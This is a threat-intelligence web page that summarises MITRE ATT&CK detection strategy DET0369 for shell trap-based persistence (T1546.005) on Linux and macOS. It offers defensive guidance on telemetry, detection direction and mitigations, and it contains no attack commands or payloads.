DET0369: Detection Strategy for Event Triggered Execution via Trap (T1546.005)

DET0369 is a MITRE detection strategy object for detecting Event Triggered Execution via Trap (T1546.005). The relevant ATT&CK technique is about using she...

EnterpriseDET0369Detection StrategyObject v1.0 Modified May 12, 2026, 16:34 UTC (UTC+00:00)

DET0369 is a MITRE detection strategy object for detecting Event Triggered Execution via Trap (T1546.005). The relevant ATT&CK technique is about using shell trap behavior on Linux and macOS to run content when interrupt signals occur, which can support persistence or privilege escalation. For leaders, the value is not the object itself—MITRE provides no official detection text here—but the reminder to verify whether endpoint monitoring can see script and shell behavior that may hide inside normal administrative automation.

Executive priority

Treat this as a coverage-validation item for Unix-like endpoint resilience. Because the related technique maps to persistence and privilege escalation on macOS and Linux, security leaders should ask whether SOC and IR teams can review shell/script changes, command-line activity, and endpoint file/process telemetry quickly during an investigation. This is especially relevant where business-critical systems rely on scripts, scheduled operations, developer workstations, or administrator shells, because benign automation can make malicious trap usage harder to distinguish without baseline evidence.

Technical view

The supplied detection strategy object has no official description or detection guidance, so defenders should anchor validation to the related ATT&CK technique: Trap (T1546.005), affecting macOS and Linux, under persistence and privilege-escalation tactics. SOC and detection engineering teams should confirm visibility into shell and script execution, command-line arguments where available, script/file modifications, and endpoint process lineage involving shells or automation contexts. IR teams should be prepared to inspect shell scripts and startup or operational scripts for signal-handling logic that causes unexpected command execution, while avoiding assumptions that all trap usage is malicious because it is common in legitimate graceful shutdown and interrupt-handling code.

Likely telemetry

Endpoint process execution telemetry for shells and script interpreters on macOS and Linux
Command-line argument capture where available
File creation and modification telemetry for shell scripts and operational automation files
EDR or host audit events showing parent-child process relationships from shell/script activity
Shell history or administrative session records where collected and permitted

Detection direction

Validate whether telemetry can identify suspicious or newly introduced trap-related logic in scripts without relying on the DET0369 object for vendor-ready analytics, because MITRE supplied no official detection text.
Baseline legitimate trap usage in administrative and application scripts to reduce false positives; trap is commonly used for graceful termination and interrupt handling.
Correlate script modification events with later shell/script execution and unusual child processes, especially on systems where persistence or privilege escalation would create high operational risk.
Prioritize coverage on Linux and macOS assets, since those are the platforms supplied by the related technique.
During investigations, compare observed script behavior against expected operational automation rather than treating trap syntax alone as conclusive evidence of compromise.

Mitigation priorities

Inventory critical Linux and macOS scripts and automation paths that influence privileged operations or business-critical services.
Apply least-privilege and change-control practices to scripts and directories that administrators or services execute.
Enable or improve endpoint logging for process execution, command-line capture, and file modification on Unix-like systems where business risk justifies it.
Use file integrity or configuration monitoring for high-value scripts to support compliance evidence and faster incident scoping.
Document legitimate trap usage in managed scripts so SOC teams have context for triage and tuning.

Analyst notes and limits

This take is based on the DET0369 detection strategy metadata and its relationship to T1546.005 Trap. The object itself does not include official MITRE detection text, platforms, tactics, or description; the actionable context comes from the relationship showing it detects Trap, which is associated with macOS, Linux, persistence, and privilege escalation.

Local environment evidence is required to determine risk and detection quality. The supplied data does not provide specific analytics, event IDs, log sources, adversary usage, exploit activity, or vendor guidance. Recommendations are therefore framed as validation and control priorities rather than guaranteed detections.

Official MITRE ATT&CK definition

Detection Strategy for Event Triggered Execution via Trap (T1546.005)

No official description is available in the imported ATT&CK source object.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

Filter related techniques 1 rows

Domain	ID	Name	Relationship / procedure
Enterprise	T1546.005	Trap Sub-technique	This object detects Trap.

Relationship explorer

All related ATT&CK context

detects · Technique T1546.005: Trap Enterprise

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release: 19.1
Object version: 1.0
Created: Oct 21, 2025, 15:10 UTC (UTC+00:00)
Modified: May 12, 2026, 16:34 UTC (UTC+00:00)
Raw hash: a6375177500599e2...

Imported snapshots across ATT&CK releases (1)

Release	Bundle imported	Object version	Modified	Status	Raw hash
19.1	May 18, 2026, 07:08 UTC (UTC+00:00)	1.0	May 12, 2026, 16:34 UTC (UTC+00:00)	Current bundle	`a63751775005…`

Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

[1]
mitre-attack DET0369
Open source URL

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use